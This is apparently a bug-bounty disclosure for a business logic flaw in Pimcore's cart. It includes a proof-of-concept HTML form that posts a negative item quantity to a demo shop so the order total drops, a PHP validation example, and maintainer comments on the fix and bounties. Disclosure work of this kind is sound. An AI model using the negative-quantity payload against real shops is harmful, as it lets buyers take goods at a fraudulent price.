Business Logic Errors in pimcore/pimcore

Valid

Reported on

Jul 24th 2021


โœ๏ธ Description

Pimcore is vulnerable to a business logic error through negative product amounts.

๐Ÿ•ต๏ธโ€โ™‚๏ธ Proof of Concept

HTML content:

<form id="form" action="https://demo.pimcore.fun/en/cart" method="POST">
  <input name="items[12]" value="1">
  <input name="items[440]" value="-69">
  <input type="submit">
</form>

  1. Save the above content into an HTML file.
  2. Open the HTML file in the browser and click the Submit button.
  3. Check out the total price.

PoC video.

💥 Impact

It is possible to get all products for free or at a very low price.
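
A server-side quantity check of the kind that rejects the PoC request, shown beside a total calculation that trusts the posted value. This is an added example, not part of the original report and not Pimcore's code or the referenced fix commit; the price list, `MAX_QTY` and the function names are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Constructed price list in cents, keyed by the product ids used in the PoC form.
const PRICES = [12 => 1500, 440 => 20];
const MAX_QTY = 100; // assumed per-line ceiling, not a Pimcore setting

// Trusts the posted quantity: a negative line subtracts from the cart total.
function naiveTotal(array $items): int
{
    $total = 0;
    foreach ($items as $id => $qty) {
        $total += PRICES[(int) $id] * (int) $qty;
    }
    return $total;
}

// Hardened parse: each line must name a known product and carry an
// integer quantity between 1 and MAX_QTY, otherwise the request is rejected.
function validateItems(array $items): array
{
    $clean = [];
    foreach ($items as $id => $qty) {
        $id = filter_var($id, FILTER_VALIDATE_INT);
        if ($id === false || !array_key_exists($id, PRICES)) {
            throw new InvalidArgumentException('unknown product id');
        }
        $qty = filter_var($qty, FILTER_VALIDATE_INT,
            ['options' => ['min_range' => 1, 'max_range' => MAX_QTY]]);
        if ($qty === false) {
            throw new InvalidArgumentException("invalid quantity for product $id");
        }
        $clean[$id] = $qty;
    }
    return $clean;
}

// Constructed input: the array PHP builds from items[12]=1&items[440]=-69.
$posted = ['12' => '1', '440' => '-69'];

echo 'naive total (cents): ', naiveTotal($posted), "\n";
try {
    validateItems($posted);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

The check belongs on the server because the PoC form is submitted from a file the client controls, so any limit enforced only in the shop's own HTML or JavaScript is bypassed.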

Bernhard Rusch
2 years ago

Maintainer


@admin how can I sign up as the maintainer of a project?

Z-Old
2 years ago

Admin


Hey Bernhard, you should have access now. You will also automatically have access to all future pimcore disclosures. Do let me know if you encounter any further issues viewing the details of this report.

Bernhard Rusch
2 years ago

Maintainer


Yep, works fine now, thanks a lot! 👍

Bernhard Rusch validated this vulnerability 2 years ago
Renan Rocha has been awarded the disclosure bounty
The fix bounty is now up for grabs
Bernhard Rusch marked this as fixed with commit f51595 2 years ago
Bernhard Rusch has been awarded the fix bounty
This vulnerability will not receive a CVE